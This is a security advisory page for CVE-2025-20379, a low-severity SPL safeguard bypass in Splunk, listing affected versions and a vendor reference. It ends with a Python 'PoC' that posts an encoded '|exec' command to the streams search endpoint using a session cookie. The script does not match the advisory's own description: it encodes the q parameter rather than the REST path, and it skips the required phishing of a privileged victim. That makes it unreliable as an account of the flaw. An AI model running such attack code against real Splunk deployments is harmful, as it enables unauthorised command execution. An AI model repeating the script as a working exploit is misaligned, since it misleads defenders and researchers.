Security Vulnerability Report
CVE-2025-20379 CVSS 3.5 LOW


Published: 2025-11-12 18:15:35
Last Modified: 2025-12-03 21:41:27

Description

In Splunk Enterprise versions below 10.0.1, 9.4.5, 9.3.7, and 9.2.9 and Splunk Cloud Platform versions below 9.3.2411.116, 9.3.2408.124, 10.0.2503.5 and 10.1.2507.1, a low-privileged user that does not hold the "admin" or "power" Splunk roles could run a saved search with a risky command using the permissions of a higher-privileged user to bypass the SPL safeguards for risky commands. They could bypass these safeguards on the "/services/streams/search" endpoint through its "q" parameter by circumventing endpoint restrictions using character encoding in the REST path. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N
Weakness: CWE-200

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.2.0 <= version < 9.2.9) - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.3.0 <= version < 9.3.7) - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* (9.4.0 <= version < 9.4.5) - VULNERABLE
cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (9.3.2408 <= version < 9.3.2408.124) - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (9.3.2411 <= version < 9.3.2411.116) - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (10.0.2503 <= version < 10.0.2503.5) - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* (10.1.2507 <= version < 10.1.2507.1) - VULNERABLE

Affected version summary:
Splunk Enterprise < 10.0.1
Splunk Enterprise < 9.4.5
Splunk Enterprise < 9.3.7
Splunk Enterprise < 9.2.9
Splunk Cloud Platform < 9.3.2411.116
Splunk Cloud Platform < 9.3.2408.124
Splunk Cloud Platform < 10.0.2503.5
Splunk Cloud Platform < 10.1.2507.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-20379 PoC - SPL Safeguard Bypass
# Target: Splunk Enterprise < 10.0.1, 9.4.5, 9.3.7, 9.2.9
# Endpoint: /services/streams/search
import requests
import urllib.parse

TARGET = "https://vulnerable-splunk.example.com"
SESSION_COOKIE = "your_session_cookie"


def encode_payload(payload):
    # URL encode special characters to bypass path validation
    encoded = payload.replace("/", "%2F")
    encoded = encoded.replace(" ", "%20")
    return encoded


def exploit():
    headers = {
        "Cookie": f"splunkd_session={SESSION_COOKIE}",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Malicious SPL command to bypass safeguards
    spl_command = "|exec"  # Dangerous command normally blocked
    # Encode the SPL command in the q parameter
    endpoint = f"{TARGET}/services/streams/search"
    # Method 1: Direct encoded payload
    data = {"q": encode_payload(spl_command)}
    response = requests.post(endpoint, headers=headers, data=data)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")


if __name__ == "__main__":
    print("CVE-2025-20379 Splunk SPL Bypass PoC")
    exploit()
```

References

https://advisory.splunk.com/advisories/SVD-2025-1102 (Vendor Advisory, SVD-2025-1102)
